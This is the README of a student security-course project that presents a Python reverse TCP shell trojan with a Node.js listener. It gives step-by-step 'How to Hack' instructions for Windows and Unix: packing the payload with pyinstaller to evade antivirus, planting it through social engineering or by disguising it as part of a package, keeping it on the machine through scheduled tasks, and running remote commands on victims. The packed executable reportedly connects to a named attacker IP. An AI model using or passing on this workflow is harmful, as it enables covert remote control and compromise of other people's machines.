CS 460 Final Project

Reverse TCP Shell a very stupid trojan

• ywang189 - Yiyi Wang
• cjsmith7 - Christian Smith

Multiple files are provided

• reverse_tcp.py
  • malicious python code, run it on victim side.
  • can be packed into "exe" file using pyinstaller and run on Windows with no antivirus software detected (tested on Windows8.1, not detected)
    • On windows, run pyinstaller --noconsole --onefile reverse_tcp.py to pack the malicious reverse_tcp.py to Windows executable file.
• listener.js
  • simple listener written in javascript(node.js)
  • Commands

      help
      exit                    ---   quit listener
      list                    ---   list victims
      connect num             ---   connect to one victim
                                    eg 'connect 0' will connect to the first victim in victim list
      schedule n_minutes      ---   schedule attack(for Windows only), force victim to try to connect to attacker every n_minutes

• schtasks_template.xml(for Windows hack only)
  • sample template for schtasks program on Windows
  • eg: when schedule a malicious task from the schtasks_template.xml on Windows, run the following command

schtasks /CREATE /XML path_to_schtasks_template.xml /TN malicious_task_name

• dist/reverse_tcp.exe
  • packed exe file using pyinstaller mentioned above.
  • don't run this file on your machine, it is dangerous(as it will connect to my attack machine at ip 45.55.139.173).
• cleanup.bat (for Windows)
  • remove our simple stupid trojan from victim's system
  • double click it to cleanup.

How to Hack (For Windows)

1. Edit the variable attacker_ip in reverse_tcp.py to attacker's ip address
2. Run pyinstaller --noconsole --onefile reverse_tcp.py to create reverse_tcp.exe
3. Copy reverse_tcp.exe to victim's machine and execute it. (No console will pop up so don't worry)
4. Run node listener.js on attacker's machine to start listening to responses from victims.

How to Hack (For .nix)

1. Edit the variable attacker_ip in reverse_tcp.py to attacker's ip address
2. Copy reverse_tcp.py to victim's machine and run python reverse_tcp.py.
3. Run node listener.js to start listening to responses from victims.

General decriptions

• On attacker side, execute node listener.js to run the listener file on attacker's machine.
• Plant and execute reverse_tcp.py on victim machine. (SE, camouflage py file as part of package, etc)

How it works(For Windows)

• The reverse_tcp.py(reverse_tcp.exe) file will first copy itself to %Appdata% folder, then create schtasks_template.xml file for scheduling tasks
• It then runs schtasks program and setup the running task so that the victim will try connecting to attacker every 30 minutes by default.
• After that, victim will try to connect to attacker's ip and port.
• Attacker will send commands to victim, and victim will execute those commands on their machine.

Why implementing Reverse TCP attack in Python

We first tried metasploit and used the windows/shell_reverse_tcp payload to generate the malicious exe file and we also tried msfencode to encode the exe file. However, no matter how we encoded the malicious exe file, Windows Defender could always detect it(It is interesting to find out that some 3rd party av couldn't detect our trojan). After doing some researches, we found out that Windows Defender will always load the program to memory first then scan it, so encoding will never work.

Screenshot

2.

3.

What we learnt

• Windows Defender is powerful.
• Not all metasploit payloads work on Windows/
• Security awareness is important
• Security is fun. CS460 is an awesome class.

Thanks ;)